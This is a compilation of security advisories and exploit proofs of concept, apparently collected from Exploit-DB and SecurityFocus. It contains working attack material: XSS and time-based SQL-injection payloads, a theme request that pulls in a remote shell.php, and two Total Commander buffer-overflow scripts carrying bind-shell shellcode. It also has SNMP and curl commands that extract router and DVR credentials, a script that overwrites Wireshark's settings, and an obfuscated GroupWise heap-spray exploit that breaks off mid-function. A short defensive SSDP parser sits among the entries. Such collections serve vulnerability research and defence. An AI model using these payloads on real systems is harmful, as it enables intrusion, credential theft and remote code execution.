source: https://www.securityfocus.com/bid/57499/info
DigiLIBE is prone to a remote information-disclosure vulnerability.
Successful exploits may allow the attacker to bypass authentication and gain access to potentially sensitive information. This may aid in further attacks.
DigiLIBE 3.4 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/configuration/general_configuration.html
source: https://www.securityfocus.com/bid/57522/info
gpEasy CMS is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
gpEasy CMS 3.5.2 and prior versions are vulnerable.
http://www.example.com//?cmd=new_section&section=%22%3%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
source: https://www.securityfocus.com/bid/57541/info
The Chocolate WP Theme for WordPress is prone to multiple security vulnerabilities.
An attacker may leverage these issues to cause denial-of-service conditions, upload arbitrary files to the affected computer, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site/big_file&h=1&w=1
http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1
http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/shell.php
source: https://www.securityfocus.com/bid/57561/info
The PHPWeby Free directory script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHPWeby Free directory script 1.2 is vulnerable; other versions may also be affected.
fullname=Ping And Pong Is Interesting Game xD%5C&mail=sssssssssssssssssss&subject=,(select case((select mid(`pass`,1,1) from admin_area limit 1 offset 0)) when 0x32 then sleep(10) else 0 end) ,1,2,3,4)-- and 5!=('Advertising+Inquiry&message=TEST
# Exploit Title: Wireshark 1.12.7 Division by zero DOS PoC
# Date: 02/09/2015
# Exploit Author: spyk <spyk[dot]developpeur[at]gmail[dot]com> @SwanBeaujard
# Vendor Homepage: https://www.wireshark.org/
# Software Link: https://www.wireshark.org/download.html
# Version: 1.12.7
# Tested on: Windows 7
# Thanks to my professor @St0rn https://www.exploit-db.com/author/?a=8143
import os
import subprocess
import getpass
# Python 2 script: locates the current user's Wireshark "recent" settings file
drive=os.getenv("systemdrive")
user=getpass.getuser()
path="%s\\Users\\%s\\AppData\\Roaming\\Wireshark\\recent" %(drive,user)
def wiresharkIsPresent():
    ps=subprocess.check_output("tasklist")
    if "Wireshark.exe" in ps:
        return 1
    else:
        return 0
def killWireshark():
    try:
        res=subprocess.check_output("taskkill /F /IM Wireshark.exe /T")
        return 1
    except:
        return 0
if wiresharkIsPresent():
    if killWireshark():
        print "Wireshark is killed!"
sploit="""
# Recent settings file for Wireshark 1.12.7.
#
# This file is regenerated each time Wireshark is quit
# and when changing configuration profile.
# So be careful, if you want to make manual changes here.
# Main Toolbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.toolbar_main_show: TRUE
# Filter Toolbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.filter_toolbar_show: TRUE
# Wireless Settings Toolbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.wireless_toolbar_show: FALSE
# Show (hide) old AirPcap driver warning dialog box.
# TRUE or FALSE (case-insensitive).
gui.airpcap_driver_check_show: TRUE
# Packet list show (hide).
# TRUE or FALSE (case-insensitive).
gui.packet_list_show: TRUE
# Tree view show (hide).
# TRUE or FALSE (case-insensitive).
gui.tree_view_show: TRUE
# Byte view show (hide).
# TRUE or FALSE (case-insensitive).
gui.byte_view_show: TRUE
# Statusbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.statusbar_show: TRUE
# Packet list colorize (hide).
# TRUE or FALSE (case-insensitive).
gui.packet_list_colorize: TRUE
# Timestamp display format.
# One of: RELATIVE, ABSOLUTE, ABSOLUTE_WITH_DATE, DELTA, DELTA_DIS, EPOCH, UTC, UTC_WITH_DATE
gui.time_format: RELATIVE
# Timestamp display precision.
# One of: AUTO, SEC, DSEC, CSEC, MSEC, USEC, NSEC
gui.time_precision: AUTO
# Seconds display format.
# One of: SECONDS, HOUR_MIN_SEC
gui.seconds_format: SECONDS
# Zoom level.
# A decimal number.
gui.zoom_level: -10
# Bytes view.
# A decimal number.
gui.bytes_view: 0
# Main window upper (or leftmost) pane size.
# Decimal number.
gui.geometry_main_upper_pane: 440
# Main window middle pane size.
# Decimal number.
gui.geometry_main_lower_pane: 428
# Packet list column pixel widths.
# Each pair of strings consists of a column format and its pixel width.
column.width: %m, 59, %t, 84, %s, 154, %d, 154, %p, 56, %L, 48, %i, 1285
# Last directory navigated to in File Open dialog.
gui.fileopen_remembered_dir: """+drive+"""\\Users\\"""+user+"""\\Documents\\
"""
try:
    f=open(path,"w")
    f.write(sploit)
    f.close()
    print "Success!"
except:
    print "Fail :("
# Exploit Title: Pligg CMS 2.0.2 SQL injection
# Date: 29-08-2015
# Exploit Author: jsass
# Vendor Homepage: http://pligg.com
# Software Link: https://github.com/Pligg/pligg-cms/archive/2.0.2.zip
# Version: 2.0.2
# Tested on: kali sana 2.0
################ Q8 Gray Hat Team ################
SQLInjection
File : load_data_for_search.php
$search = new Search();
if(isset($_REQUEST['start_up']) and $_REQUEST['start_up']!= '' and $_REQUEST['pagesize'] != ''){
    $pagesize = $_REQUEST['pagesize'];
    $start_up = $_REQUEST['start_up'];
    $limit = " LIMIT $start_up, $pagesize";
}
if(isset($_REQUEST['sql']) and $_REQUEST['sql']!= ''){
    $sql = $_REQUEST['sql'];
    $search->sql = $sql.$limit;
}
$fetch_link_summary = true;
$linksum_sql = $sql.$limit;
Exploit : http://localhost/pligg-cms-master/load_data_for_search.php?sql={SQLi}
Type Injection : Boolean & Time Based
Use SQLmap To Inject ..
Demo : http://www.pligg.science/load_data_for_search.php?sql={SQLi}
################ Q8 Gray Hat Team ################
Greets To : sec4ever.com && alm3refh.com
# Exploit Title: Information Exposure via SNMP on Thomson CableHome Gateway [MODEL: DWG849] Cable Modem Gateway
# Google Dork: n/a
# Date: 09/18/2015
# Exploit Author: Matt Dunlap
# Vendor Homepage: http://www.technicolor.com/en/solutions-services/connected-home/modems-gateways
# Software Link: n/a
# Version: Thomson CableHome Gateway <<HW_REV: 1.0; VENDOR: Thomson; BOOTR: 2.1.7i; SW_REV: STC0.01.16; MODEL: *DWG849*>>
# Tested on: Ubuntu 14.04.3
# CVE : Not reported to vendor (yet)
Information Exposure via SNMP on Thomson CableHome Gateway [MODEL: DWG849] Cable Modem Gateway
Affected Product:
Thomson CableHome Gateway <<MODEL: DWG849>> Cable Modem Gateway
NOTE: The model DWG850-4 is open to the same attack but doesn't come with the remote administration enabled (no web interface, no telnet)
Severity Rating:
Important
Impact:
Username and password for the user interface as well as wireless network keys can be disclosed through SNMP.
At the time of posting this there are 61,505 results on Shodan for this model.
By default there are 2 open ports: 161 (snmp), 8080 (web administration)
The default password of 4GIt3M has been set on every unit I've tested so far
Description:
The Thomson CableHome Gateway DWG849 Cable Modem Gateway product specifications list SNMP v2 & v3 under Network Management. The management information bases (MIBs) of various device subsystems on the DWG849 allow local and remote network users to discover user interface credentials and wireless network key values through simple SNMP requests for the value of these variables. Because the authentication in SNMPv1 and SNMPv2c does not offer sufficient protection, this increases the risk that the values can be disclosed through SNMP using the default read-only community "private".
Object Identifiers (OIDs):
Make, Model, Software Version:
1.3.6.1.2.1.1.1.0
1.3.6.1.2.1.1.3.0
Web Interface Username \ Password (DEFAULT: admin \ Uq-4GIt3M)
1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0
1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0
SSID and KEY
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32
1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32
Guest Network OIDs
Other OIDs of interest include
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.33
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.34
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.35
[POC]
snmpget -t15 -v 2c -c private [host] 1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0 1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32 1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32
This issue has not been reported to the vendor.
#!/usr/bin/python
# EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Credits: Un_N0n
# Date of Testing: 19th September 2015
# Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe
# Tested On : Windows XP Service Pack 2
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called time.txt
# Step 3: Copy the contents of time.txt file
# Step 4: Now open Total Commander 8.52
# Step 5: Go To file > Change Attributes.
# Step 6: In time field paste the contents of time.txt
# Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc
file = open('time.txt' , 'w');
buffer = "\x90"*190
buffer += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # Egghunter looking for R0cX R0cX
buffer += "\x90"*(265- len(buffer))
buffer += "\x47\x47\xf7\x75" #75F74747 FFE0 JMP EAX
# bad characters - \x00\x0a\x0d
# msfvenom -p windows/shell_bind_tcp -f c -b '\x00\x0a\x0d'
buffer += "R0cX" + "R0cX" + ("\xbf\x46\xeb\xb1\xe7\xda\xc5\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x53\x31\x7d\x12\x83\xc5\x04\x03\x3b\xe5\x53\x12\x3f\x11\x11"
"\xdd\xbf\xe2\x76\x57\x5a\xd3\xb6\x03\x2f\x44\x07\x47\x7d\x69"
"\xec\x05\x95\xfa\x80\x81\x9a\x4b\x2e\xf4\x95\x4c\x03\xc4\xb4"
"\xce\x5e\x19\x16\xee\x90\x6c\x57\x37\xcc\x9d\x05\xe0\x9a\x30"
"\xb9\x85\xd7\x88\x32\xd5\xf6\x88\xa7\xae\xf9\xb9\x76\xa4\xa3"
"\x19\x79\x69\xd8\x13\x61\x6e\xe5\xea\x1a\x44\x91\xec\xca\x94"
"\x5a\x42\x33\x19\xa9\x9a\x74\x9e\x52\xe9\x8c\xdc\xef\xea\x4b"
"\x9e\x2b\x7e\x4f\x38\xbf\xd8\xab\xb8\x6c\xbe\x38\xb6\xd9\xb4"
"\x66\xdb\xdc\x19\x1d\xe7\x55\x9c\xf1\x61\x2d\xbb\xd5\x2a\xf5"
"\xa2\x4c\x97\x58\xda\x8e\x78\x04\x7e\xc5\x95\x51\xf3\x84\xf1"
"\x96\x3e\x36\x02\xb1\x49\x45\x30\x1e\xe2\xc1\x78\xd7\x2c\x16"
"\x7e\xc2\x89\x88\x81\xed\xe9\x81\x45\xb9\xb9\xb9\x6c\xc2\x51"
"\x39\x90\x17\xcf\x31\x37\xc8\xf2\xbc\x87\xb8\xb2\x6e\x60\xd3"
"\x3c\x51\x90\xdc\x96\xfa\x39\x21\x19\x15\xe6\xac\xff\x7f\x06"
"\xf9\xa8\x17\xe4\xde\x60\x80\x17\x35\xd9\x26\x5f\x5f\xde\x49"
"\x60\x75\x48\xdd\xeb\x9a\x4c\xfc\xeb\xb6\xe4\x69\x7b\x4c\x65"
"\xd8\x1d\x51\xac\x8a\xbe\xc0\x2b\x4a\xc8\xf8\xe3\x1d\x9d\xcf"
"\xfd\xcb\x33\x69\x54\xe9\xc9\xef\x9f\xa9\x15\xcc\x1e\x30\xdb"
"\x68\x05\x22\x25\x70\x01\x16\xf9\x27\xdf\xc0\xbf\x91\x91\xba"
"\x69\x4d\x78\x2a\xef\xbd\xbb\x2c\xf0\xeb\x4d\xd0\x41\x42\x08"
"\xef\x6e\x02\x9c\x88\x92\xb2\x63\x43\x17\xc2\x29\xc9\x3e\x4b"
"\xf4\x98\x02\x16\x07\x77\x40\x2f\x84\x7d\x39\xd4\x94\xf4\x3c"
"\x90\x12\xe5\x4c\x89\xf6\x09\xe2\xaa\xd2")
file.write(buffer)
file.close()
#!/usr/bin/python
# EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Credits: Un_N0n
# Date of Testing: 19th September 2015
# Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe
# Tested On : Windows 10
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called time.txt
# Step 3: Copy the contents of time.txt file
# Step 4: Now open Total Commander 8.52
# Step 5: Go To file > Change Attributes.
# Step 6: In time field paste the contents of time.txt
# Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc
file = open('time.txt' , 'wb');
buffer = "\x90"*265 + "\xfe\x24\x76\x6d" + "\x90"*160 # 265 NOPS + Jmp eax + 160 NOPS + SHELLCODE + 10 NOPS
# msfvenom -p windows/shell_bind_tcp -f c -b '\x00\x0a\x0d'
buffer += ("\xdb\xcb\xd9\x74\x24\xf4\x5a\x31\xc9\xbe\x97\xf8\xc7\x9d\xb1"
"\x53\x31\x72\x17\x03\x72\x17\x83\x7d\x04\x25\x68\x7d\x1d\x28"
"\x93\x7d\xde\x4d\x1d\x98\xef\x4d\x79\xe9\x40\x7e\x09\xbf\x6c"
"\xf5\x5f\x2b\xe6\x7b\x48\x5c\x4f\x31\xae\x53\x50\x6a\x92\xf2"
"\xd2\x71\xc7\xd4\xeb\xb9\x1a\x15\x2b\xa7\xd7\x47\xe4\xa3\x4a"
"\x77\x81\xfe\x56\xfc\xd9\xef\xde\xe1\xaa\x0e\xce\xb4\xa1\x48"
"\xd0\x37\x65\xe1\x59\x2f\x6a\xcc\x10\xc4\x58\xba\xa2\x0c\x91"
"\x43\x08\x71\x1d\xb6\x50\xb6\x9a\x29\x27\xce\xd8\xd4\x30\x15"
"\xa2\x02\xb4\x8d\x04\xc0\x6e\x69\xb4\x05\xe8\xfa\xba\xe2\x7e"
"\xa4\xde\xf5\x53\xdf\xdb\x7e\x52\x0f\x6a\xc4\x71\x8b\x36\x9e"
"\x18\x8a\x92\x71\x24\xcc\x7c\x2d\x80\x87\x91\x3a\xb9\xca\xfd"
"\x8f\xf0\xf4\xfd\x87\x83\x87\xcf\x08\x38\x0f\x7c\xc0\xe6\xc8"
"\x83\xfb\x5f\x46\x7a\x04\xa0\x4f\xb9\x50\xf0\xe7\x68\xd9\x9b"
"\xf7\x95\x0c\x31\xff\x30\xff\x24\x02\x82\xaf\xe8\xac\x6b\xba"
"\xe6\x93\x8c\xc5\x2c\xbc\x25\x38\xcf\xd3\xe9\xb5\x29\xb9\x01"
"\x90\xe2\x55\xe0\xc7\x3a\xc2\x1b\x22\x13\x64\x53\x24\xa4\x8b"
"\x64\x62\x82\x1b\xef\x61\x16\x3a\xf0\xaf\x3e\x2b\x67\x25\xaf"
"\x1e\x19\x3a\xfa\xc8\xba\xa9\x61\x08\xb4\xd1\x3d\x5f\x91\x24"
"\x34\x35\x0f\x1e\xee\x2b\xd2\xc6\xc9\xef\x09\x3b\xd7\xee\xdc"
"\x07\xf3\xe0\x18\x87\xbf\x54\xf5\xde\x69\x02\xb3\x88\xdb\xfc"
"\x6d\x66\xb2\x68\xeb\x44\x05\xee\xf4\x80\xf3\x0e\x44\x7d\x42"
"\x31\x69\xe9\x42\x4a\x97\x89\xad\x81\x13\xb9\xe7\x8b\x32\x52"
"\xae\x5e\x07\x3f\x51\xb5\x44\x46\xd2\x3f\x35\xbd\xca\x4a\x30"
"\xf9\x4c\xa7\x48\x92\x38\xc7\xff\x93\x68")
buffer += "\x90" *10
file.write(buffer)
file.close()
source: https://www.securityfocus.com/bid/57564/info
iCart Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
iCart Pro 4.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/forum/icart.php?do=editproduct&productid=19&section='
1. Advisory Information
Title: ADH-Web Server IP-Cameras Improper Access Restrictions
EDB-ID: 38245
Advisory ID: OLSA-2015-0919
Advisory URL: http://www.orwelllabs.com/2015/10/adh-web-server-ip-cameras-improper.html
Date published: 2015-09-19
Date of last update: 2016-02-15
Vendors contacted: Dedicated Micros
2. Vulnerability Information
Class: Information Exposure [CWE-200]
Impact: Access Control Bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: N/A
3. Vulnerability Description
Due to improper access restriction, the ADH-Web device [1] allows a remote attacker to browse and access arbitrary files from the directory '/hdd0/logs'. A considerable amount of information (useful in a fingerprinting step) can also be obtained via the variable parameter of the variable.cgi script [2].
Background:
Dedicated Micros’ ground breaking Closed IPTV solution makes deploying an IP Video, CCTV system safe, secure and simple. Combining patent-pending innovation with zeroconf networking technology, Closed IPTV automatically allocates IP addresses to IP cameras by physical port. In this way the system is completely deterministic, creating firewalls and monitoring IP connections by individual network ports so they cannot be hacked or intercepted. This ground breaking solution provides a very simple and secure answer to IP Video, meaning that no prior knowledge of IP networking is required. Sophisticated and Dependable network security can be achieved with a single click.
4. Vulnerable Packages
- SD Advanced Closed IPTV
- SD Advanced
- EcoSense
- Digital Sprite 2
5. Technical Description
[1] Usually this directory is protected against unauthenticated access (401 Unauthorized); however, every file inside it can be accessed directly without requiring authentication, as in the example below:
(401): http://<target_ip>/hdd0/logs
(200): http://<target_ip>/hdd0/logs/log.txt
> Most common logfiles:
arc_log.txt
bak.txt
connect.txt
log.txt
seclog.log
startup.txt
DBGLOG.TXT
access.txt
security.txt
[2] Another problem identified is an information exposure via the variable parameter of the variable.cgi script. Knowing some variable names, one can extract a reasonable amount of information:
> DNS:
http://target_ip/variable.cgi?variable=dhcp_dns&slaveip=0.0.0.0
> ftp master ftp console credentials:
http://target_ip/variable.cgi?variable=console_master_ftpuser&slaveip=0.0.0.0
http://target_ip/variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0
(although the vast majority of servers have ftp/telnet with anonymous access allowed.)
> alms
http://target_ip/variable.cgi?variable=alarm_title&slaveip=0.0.0.0
> camconfig
http://target_ip/variable.cgi?variable=camconfig[0]&slaveip=127.0.0.1
(includes, but is not limited to)
This server also sends credentials (and other sensitive data) via GET parameters. This is poor practice, as the URL is liable to be logged in any number of places between the customer and the camera. The credentials should be passed in the body of a POST request (over SSL, of course, which is not the case here). It is possible to create, edit and delete users and other configuration in this way, which makes for very dangerous CSRF vectors.
6. Vendor Information, Solutions and Workarounds
The vendor found that some things are not vulnerabilities (sensitive information via GET, for example) and others are useless (hardcoded credentials) and others are not yet so critical (access to server logs). I think that at least this information can assist during an intrusion test, as will be shown soon.
7. Credits
These vulnerabilities have been discovered by Orwelllabs.
8. Report Timeline
2015-08-31: Vendor has been notified about the vulnerabilities (without details yet).
2015-09-01: Vendor acknowledges the receipt of the email and asks for technical details.
2015-09-01: An email with technical details is sent to the vendor.
2015-09-11: Still no response, another email was sent to the Vendor requesting any opinion on the reported problems.
2015-09-11: The vendor reported that the matter was passed on to the development team and that it would contact me the following week (2015-09-14).
2015-09-14: The development team responded with its consideration of the points and reported that, according to this response, the impact of these vulnerabilities is low and they are no longer available unauthenticated using the recent software release (version 10212).
Legal Notices
+++++++++++++
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of this information.
About Orwelllabs
++++++++++++++++
Orwelllabs is a security research lab interested in embedded device & webapp hacking.
We aim to create some intelligence around this vast and confusing picture that is the Internet of Things.
source: https://www.securityfocus.com/bid/57579/info
Multiple Hunt CCTV devices are prone to a remote information-disclosure vulnerability.
Successful exploits will allow attackers to obtain sensitive information, such as credentials, that may aid in further attacks.
curl -v http://www.example.com/DVR.cfg | strings |grep -i USER
source: https://www.securityfocus.com/bid/57602/info
MiniUPnP is prone to multiple denial-of-service vulnerabilities.
Attackers can exploit these issues to cause denial-of-service conditions.
MiniUPnP versions prior to 1.4 are vulnerable.
M-SEARCH * HTTP/1.1
Host:239.255.255.250:1900
ST:uuid:schemas:device:MX:3< no CRLF >
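As an added defensive example (not part of the advisory or of MiniUPnP), a strict SSDP M-SEARCH parser in Python that discards datagrams shaped like the one quoted above, where the last header line is not CRLF-terminated, before any value from them is used. The size limits, required headers and ST grammar it enforces are the example's own assumptions.

```python
import re

# Constructed sample datagrams (not captured from a real device).
GOOD_MSEARCH = (
    b"M-SEARCH * HTTP/1.1\r\n"
    b"HOST:239.255.255.250:1900\r\n"
    b'MAN:"ssdp:discover"\r\n'
    b"MX:3\r\n"
    b"ST:urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
    b"\r\n"
)
# Shaped like the request quoted in the advisory: the ST line swallows the
# MX field and the datagram ends without CRLF.
BAD_MSEARCH = (
    b"M-SEARCH * HTTP/1.1\r\n"
    b"Host:239.255.255.250:1900\r\n"
    b"ST:uuid:schemas:device:MX:3"
)

MAX_DATAGRAM = 1500   # assumption: one Ethernet-sized UDP payload
MAX_HEADERS = 32      # assumption: generous bound on header count
# Assumed ST grammar: the well-known search targets plus uuid:/urn: forms
# with bounded, conservative character sets.
ST_RE = re.compile(
    rb"^(ssdp:all|upnp:rootdevice|uuid:[A-Za-z0-9-]{1,64}"
    rb"|urn:[A-Za-z0-9._-]+(:[A-Za-z0-9._-]+)*)$"
)


def parse_msearch(datagram):
    """Return the header dict for a well-formed M-SEARCH, or None to drop it.

    Every check below is a reason to discard the datagram before any value
    from it is copied into a fixed buffer or used as a lookup key.
    """
    if not isinstance(datagram, bytes) or len(datagram) > MAX_DATAGRAM:
        return None
    # The request must be terminated by an empty line; a missing CRLF at the
    # end is exactly the malformed shape the advisory describes.
    if not datagram.endswith(b"\r\n\r\n"):
        return None
    lines = datagram[:-4].split(b"\r\n")
    if lines[0] != b"M-SEARCH * HTTP/1.1":
        return None
    if len(lines) - 1 > MAX_HEADERS:
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        # Header name must be present, a plain token, and not repeated.
        if not sep or not re.match(rb"^[A-Za-z0-9-]+$", name):
            return None
        key = name.lower()
        if key in headers:
            return None
        headers[key] = value.strip()
    for required in (b"host", b"man", b"st"):
        if required not in headers:
            return None
    if headers[b"man"] != b'"ssdp:discover"':
        return None
    if not ST_RE.match(headers[b"st"]):
        return None
    # MX, when present, must be a small non-negative integer (seconds).
    if b"mx" in headers:
        mx = headers[b"mx"]
        if not mx.isdigit() or int(mx) > 120:
            return None
    return headers


if __name__ == "__main__":
    print("good:", parse_msearch(GOOD_MSEARCH))
    print("bad :", parse_msearch(BAD_MSEARCH))
```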
source: https://www.securityfocus.com/bid/57657/info
Novell Groupwise Client is prone to multiple remote code-execution vulnerabilities.
A remote attacker can leverage this issue to execute arbitrary code within the context of the application. Successful exploits will compromise the application, and possibly, the underlying computer.
The following versions are vulnerable:
Versions prior to 8.0.3 Hot Patch 2
Versions prior to GroupWise 2012 SP1 Hot Patch 1
<!-- (c)oded by High-Tech Bridge Security Research Lab -->
<!-- Windows XP-SP3 Internet Explorer 8.0 - Dep Disabled -->
<html>
<Title>- Novell GroupWise 12.0 InvokeContact method Exploit - </Title>
<object id=ctrl classid='clsid:{54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}'></object>
<script language='javascript'>
function GyGguPonxZoADbtgXPS() {
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl = function(maxAlloc, heapBase) {
this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
this.heapBase = (heapBase ? heapBase : 0x150000);
this.KJZFzfumaV = "AAAA";
while (4 + this.KJZFzfumaV.length*2 + 2 < this.maxAlloc) {
this.KJZFzfumaV += this.KJZFzfumaV;
}
this.mem = new Array();
this.AocZkxOTvEXwFTsIPMSanrManzYrte();
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.mNhbOXqosTNKjGhfj = function(msg) {
void(Math.atan2(0xbabe, msg));
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.YMQLSZf = function(enable) {
if (enable == true)
void(Math.atan(0xbabe));
else
void(Math.asin(0xbabe));
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ooWKILTrZUXKEMl = function(msg) {
void(Math.acos(0xbabe));
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.zoNWUcOOYegFinTDSbOSAAM = function(len) {
if (len > this.KJZFzfumaV.length)
throw "Requested zoNWUcOOYegFinTDSbOSAAM string length " + len + ", only " + this.KJZFzfumaV.length + " available";
return this.KJZFzfumaV.substr(0, len);
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.UWzqrDQwReXOllGssMYEzruQtomLp = function(num, UWzqrDQwReXOllGssMYEzruQtomLp) {
if (UWzqrDQwReXOllGssMYEzruQtomLp == 0)
throw "Round argument cannot be 0";
return parseInt((num + (UWzqrDQwReXOllGssMYEzruQtomLp-1)) / UWzqrDQwReXOllGssMYEzruQtomLp) * UWzqrDQwReXOllGssMYEzruQtomLp;
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.beTBwoiJGBBhwyZg = function(num, width)
{
var digits = "0123456789ABCDEF";
var beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1);
while (num > 0xF) {
num = num >>> 4;
beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1) + beTBwoiJGBBhwyZg;
}
var width = (width ? width : 0);
while (beTBwoiJGBBhwyZg.length < width)
beTBwoiJGBBhwyZg = "0" + beTBwoiJGBBhwyZg;
return beTBwoiJGBBhwyZg;
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.RBRfbU = function(RBRfbU) {
return unescape("%u" + this.beTBwoiJGBBhwyZg(RBRfbU & 0xFFFF, 4) + "%u" + this.beTBwoiJGBBhwyZg((RBRfbU >> 16) & 0xFFFF, 4));
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.nPdkLCpaz = function(arg, tag) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (this.mem[tag] === undefined)
this.mem[tag] = new Array();
if (typeof arg == "string" || arg instanceof String) {
this.mem[tag].push(arg.substr(0, arg.length));
}
else {
this.mem[tag].push(this.zoNWUcOOYegFinTDSbOSAAM((arg-6)/2));
}
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.SWc = function(tag) {
delete this.mem[tag];
CollectGarbage();
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.AocZkxOTvEXwFTsIPMSanrManzYrte = function() {
this.mNhbOXqosTNKjGhfj("Flushing the OLEAUT32 cache");
this.SWc("oleaut32");
for (var i = 0; i < 6; i++) {
this.nPdkLCpaz(32, "oleaut32");
this.nPdkLCpaz(64, "oleaut32");
this.nPdkLCpaz(256, "oleaut32");
this.nPdkLCpaz(32768, "oleaut32");
}
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.uYiBaSLpjlOJJdhFAb = function(arg, tag) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if (size == 32 || size == 64 || size == 256 || size == 32768)
throw "Allocation sizes " + size + " cannot be flushed out of the OLEAUT32 cache";
this.nPdkLCpaz(arg, tag);
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.K = function(tag) {
this.SWc(tag);
this.AocZkxOTvEXwFTsIPMSanrManzYrte();
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbTbmzXVnhA = function() {
this.mNhbOXqosTNKjGhfj("Running the garbage collector");
CollectGarbage();
this.AocZkxOTvEXwFTsIPMSanrManzYrte();
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ZsJjplNR = function(arg, count) {
var count = (count ? count : 1);
for (var i = 0; i < count; i++) {
this.uYiBaSLpjlOJJdhFAb(arg);
this.uYiBaSLpjlOJJdhFAb(arg, "ZsJjplNR");
}
this.uYiBaSLpjlOJJdhFAb(arg);
this.K("ZsJjplNR");
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbjLbPsZ = function(arg, count) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (size+8 >= 1024)
throw("Maximum WbjLbPsZ block size is 1008 bytes");
var count = (count ? count : 1);
for (var i = 0; i < count; i++)
this.uYiBaSLpjlOJJdhFAb(arg, "WbjLbPsZ");
this.K("WbjLbPsZ");
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.foURAtIhCeelDtsbOQrWNdbMLDvFP = function(arg)
{
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
